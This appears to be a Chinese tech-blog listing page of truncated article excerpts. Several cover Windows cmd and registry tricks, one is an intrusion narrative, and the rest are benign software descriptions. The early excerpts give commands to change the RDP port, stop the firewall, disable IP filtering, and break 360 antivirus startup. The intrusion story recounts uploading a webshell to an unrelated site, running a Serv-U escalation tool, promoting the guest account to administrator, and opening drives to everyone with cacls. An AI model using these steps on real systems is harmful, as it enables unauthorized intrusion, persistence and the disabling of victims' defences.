以下所有命令均在cmd下执行,方法并不是唯一的,还有其他方法,以下仅举例几种。 涉及到修改注册表文件的,前提是无安全类软件保护注册表。 查看远程终端端口: 导出终端端口注册表内容,然后在cmd下查看。 1、导出注册表内容,其中yiming.reg为导出文件名称,可自定义: 1.regedit /e yiming.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" 2、查看导出的注册表内容,找出端口: 1.type yiming.reg 文件内容较多,也可进行条件查找: 1.type yiming.reg|find "PortNumber" 得到回显,类似:"PortNumber"=dword:00000d3d 用科学计算器将十六进制“00000d3d”转换为十进制,即得到远程终端端口。 修改远程端口: 1、写注册表文件 1.echo Windows Registry Editor Version 5.00>>3389.reg 2.echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 3.echo "PortNumber"=dword:00000d3d>>3389.reg 其中“dword:00000d3d”为端口号,请通过科学计算器自行转换。3389.reg为文件名,可自定义。 2、导入注册表文件 1.regedit /s 3389.reg 重启生效: 1.shutdown -r 如不能连接,有可能是系统防火墙造成的,关闭防火墙: 1.net stop SharedAccess 查看开机启动项:导出开机启动项注册表内容,然后在cmd下查看(和上面的类似) 1、导出注册表内容 1.regedit /e kaiji.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 2、查看导出的注册表内容 1.type kaiji.reg 3、修改开机启动项 根据导出的注册表内容,进行修改,然后写注册表文件。 例如:360安装路径在C盘,将路径改为D盘,使其无法启动。 1.echo Windows Registry Editor Version 5.00>>xiugai.reg 2.echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>xiugai.reg 3.echo "360Safetray"="\"D:\\Program Files\\360\\360Safe\\safemon\\360Tray.exe\" /start">>xiugai.reg 导入注册表文件: 1.regedit /s xiugai.reg […]
View DetailsOn Error Resume Next strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set colNicConfig = objWMIService.ExecQuery ("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True") For Each objNicConfig in colNicConfig If objNicConfig.IPFilterSecurityEnabled Then intDisableReturn = objNicConfig.DisableIPSec If intDisableReturn = 0 Then WScript.Echo "ip过滤已禁用." ElseIf intDisableReturn = 1 Then WScript.Echo "ip过滤已禁用." & VbCrLf & " 必须重新启动使更改生效." Else WScript.Echo "无法禁用ip过滤" […]
View Details|
1 |
net stop "Windows Firewall/Internet Connection Sharing (ICS)"<br /><br />以下是该服务的依存服务<br />Network Connections<br />Remote Access Connetion Manager<br />Windows Management Instrumentation<br />无其他服务依存此服务 |
作者:lvhuana 来自:http://www.wrsky.com/ 日期:2004.12.11LvHuaNa一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了……….一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去……….更加郁闷了!:(想想反正也是没有事情做,测试一下主机安全做的怎么样吧,呵呵(太菜,说测试人家安全实在是抬高自己了)在cmd下ping了一下得到了对方的ip,然后登陆http://whois.webhosting.info/对方ip看看有没有其他的站点,哈,这下发了,上面有几十个站点,估计我还是能找到一个两个带漏洞的站点的`经过漫长的查找,终于找到一个动易带漏洞的页面_Soft.asp">http://www.xxxx.net/Upfile_Soft.asp,上传一个webshell(海阳2005正式版)先(怎么上传我就不罗嗦了,上传工具现在漫天飘了)。 二:成功提升权限建立用户拿到webshell后高高兴兴的登陆了,突然发现什么权限都没有,只能在自己的webshell所在的目录里面打转(c.d.e.f盘都浏览不了),连删除文件的权限都没有,郁闷呀……..回到〖Server〗下看看主机开了什么服务吧,经过发现他开了终端服务和serv-u服务,哈,这下有搞头了^_^用superscan扫描了一下他的ip,果然通过banner看出他是用的serv-u,版本5.0。到〖Wscript.Shell〗下面试试看能执行cmd命令不能,输入net user后没有反映,再试通过Wscript.Shell能执行cmd命令不能,再次输入net user后执行返回了对方的user名单,哈哈,这下好了,能拿下了!!上传serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目录下面,改名为:test.exe,然后回到〖Wscript.Shell〗下执行命令去了,嘿嘿,马上一只肥鸡就要到手了,高兴ing~通过Wscript.Shell执行cmd命令:D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest /active:yes" #激活guest账号,我喜欢用这个账号D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest lvhuana" #把guest账号的密码设定为lvhuanaD:\a004\tggtwe\****.com\UploadSoft\test.exe "net localgroup administrators guest /add" #提升guest权限到admin权限好了,账号建立完毕,执行一下net localgroup administrators看看成功没,通过回显知道添加成功了。然后执行netstat -an后看到他开的终端端口是默认的3389,OK,连接试试~ 三:解决TCP/IP筛选连接不上!?晕………..再拿出superscan来扫一下他的3389,根本扫不到……..(开了防火墙!?靠,我的点真背…..)没有办法了,再次回到Wscript.Shell执行cmd命令:D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe c: /e /t /g everyone:F" #把c盘设置为everyone可以浏览D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe e: /e /t /g everyone:F" #把e盘设置为everyone可以浏览D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe f: /e /t […]
View DetailsRadmin (Remote Administrator)是一款屡获殊荣的远程控制软件,它将远程控制、外包服务组件、以及网络监控结合到一个系统里,提供目前为止最快速、强健而安全的工具包。 软件特点 1.运行速度快。 2.Radmin支持被控端以服务的方式运行、支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等。 3.在安全性方面,Radmin支持Windows NT/2000用户级安全特性,您可以将远程控制的权限授予特定的用户或者用户组,Radmin将以加密的模式工作,所有的数据(包括屏幕影像、鼠标和键盘的移动)都使用128位强加密算法加密; 服务器端会将所有操作写进日志文件,以便于事后查询,服务器端有IP过滤表,对IP过滤表以外的控制请求将不予回应。 4.Radmin 目前支持TCP/IP协议,应用十分广泛。
View Detailswin8系统在,许多软件都需求安装framework3.5,但是很多用户都是安装失败,联网失败,据网上的许多人说有用cmd输入命令,然后到100%,就会成功安装framework3.5(如这个方法:win8 下安装 .net framework 3.5.1: 1. 打开 win8 安装盘,提取 sources\sxs 文件夹到 d:\sources\sxs (或别的盘也行,举个例子); 2. 打开 c:\windows\system32 文件夹,找到 cmd.exe,右击,选择"以管理员身份运行3. 在命令行执行以下命令: dism.exe /online /enable-feature /featurename:NetFX3 /Source:X:\sources\sxs 大概一两分钟就执行完了,执行结果如下: Deployment Image Servicing and Management toolVersion: 6.2.8102.0 Image Version: 6.2.8102.0 Enabling feature(s)[==========================100.0%==========================]The operation completed successfully. ,但是很多人在到达66.8%的时候的失败了。 其实这个方法是正确的,但是你们会失败是因为你们安装的是win8简体中文版,按照上面的方法从win8系统盘提取出的sxs文件夹,却必须是英文版win8的文件夹,所以需要下载一个英文版的win8iso文件,然后解压,提取出文件夹的sxs文件夹,用上面的那个方法就可以到达100%了 http://www.win8china.com/html/505.html win8所有镜像下载 转自:http://tieba.baidu.com/p/1612409062
View Details简介端口映射是一个服务器,将RPC程序号转换为DARPA的协议端口号。在使用RPC调用时它必须运行。portmap进程的主要功能是把RPC程序号转化为Internet的端口号。当一个RPC服务器启动时,会选择一个空闲的端口号并在上面监听(每次启动后的端口号各不相同),同时它作为一个可用的服务会在portmap进程注册。一个RPC服务器对应惟一一个RPC程序号,RPC服务器告诉portmap进程它在哪个端口号上监听连接请求和为哪个RPC程序号提供服务。经过这个过程,portmap进程就知道了每一个已注册的RPC服务器所用的Internet端口号,而且还知道哪个程序号在这个端口上是可用的。portmap进程维护着一张RPC程序号到Internet端口号之间的映射表,它的字段包括程序号、版本号、所用协议、端口号和服务名,portmap进程通过这张映射表来提供程序号-端口号之间的转化功能如果portmap进程停止了运行或异常终止,那么该系统上的所有RPC服务器必须重新启动。首先停止NFS服务器上的所有NFS服务进程,然后启动portmap进程,再启动服务器上的NFS进程。 特点但portmap只在第一次建立连接的时候起作用,帮助网络应用程序找到正确的通讯端口,但是一旦这个双方正确连接,端口和应用就绑定,portmap也就不起作用了。但对其他任何第一次需要找到端口建立通讯的应用仍然有用。简单的说,portmap就是应用和端口的婚姻介绍人,双方成事了以后,媒婆就没用了。
View DetailsMicrosoft Office Publisher是微软公司发行的桌面出版应用软件。它常被人们认为是一款入门级的桌面出版应用软件,它能提供比Microsoft Word更强大的页面元素控制功能,但比起专业的页面布局软件,来还略逊一筹。 比起其它桌面出版软件来,Publisher在历史上一直不受高端商务打印商店欢迎。它只能用于Windows,而业界占相当份额的系统运行的是苹果公司的Mac OS X。Publisher定位于入门级的应用软件造成了很多的问题,比如在服务提供商的电脑上没有相应字体和嵌入对象等等(虽然Publisher提供了可以把相关联的文件压缩成一个自释放应用程序的工具)。许多高端特性,比如透明化、对象阴影、slugs、路径文本、内嵌的PDF输出等等,或者没有完全实现,或者干脆没有。但最近的一些版本有了很大的提高,开始关注色彩分离以及正确地处理彩色输出。Publisher 2007还包含了期待已久的特性,可以输出商业出版品质带内嵌字体的PDF格式,作为选件可以从微软网站下载。 Publisher被包含在高端的Microsoft Office版本中。这反映了微软对Publisher的定位,它是一款易用的,相比于那些重量级产品而言价格适中的产品,它的目标用户主要是那些没有专业人员制作市场推广材料以及其它文档的中小型企业。 Publisher的大部份替代品,除Adobe PageMaker外,都不提供导入Publisher的功能;但是,Publisher可以导出成EMF(Enhanced Metafile)格式,它可以被其它软件支持。
View DetailsMicrosoft OneNote,是一套用于自由形式的信息获取以及多用户协作工具。OneNote最常用于笔记本电脑或台式电脑,但这套软件更适合用于支持手写笔操作的平板电脑,在这类设备上可使用触笔、声音或视频创建笔记,比单纯使用键盘更方便。 OneNote软件的界面实际上就是我们所熟悉的,带有标签的三环活页夹的电子版本,可用于直接记录笔记,但也可用于收集打印的“页面”,或由其他应用程序发送过来的页面。页面可以在活页夹内部移动,同时可通过电子墨水技术添加注释,处理文字,或绘图,并且其中还可内嵌多媒体影音或Web链接。作为容器以及收集自不同来源的信息仓库,OneNote笔记本非常适合用于整理来自某个课程或研究项目的大量信息。 OneNote的重要创新之一是内建的搜索功能,以及可索引的图形和音频仓库。图像文件(例如屏幕截图、扫描的嵌入式文档,或照片)中可以搜索内嵌的文本内容,电子墨水注释也可作为文字进行搜索。音频内容也可以通过关键字进行语义搜索,同时还可以在录制的同时播放笔记中记录的内容。 该软件的多用户功能可实现脱机编辑和随后的同步合并,并可以段落为基础进行合并。这使得OneNote成为一个非常适合就某个项目进行协作,而且所有成员并非总是在线的情况下使用的强大工具。
View Details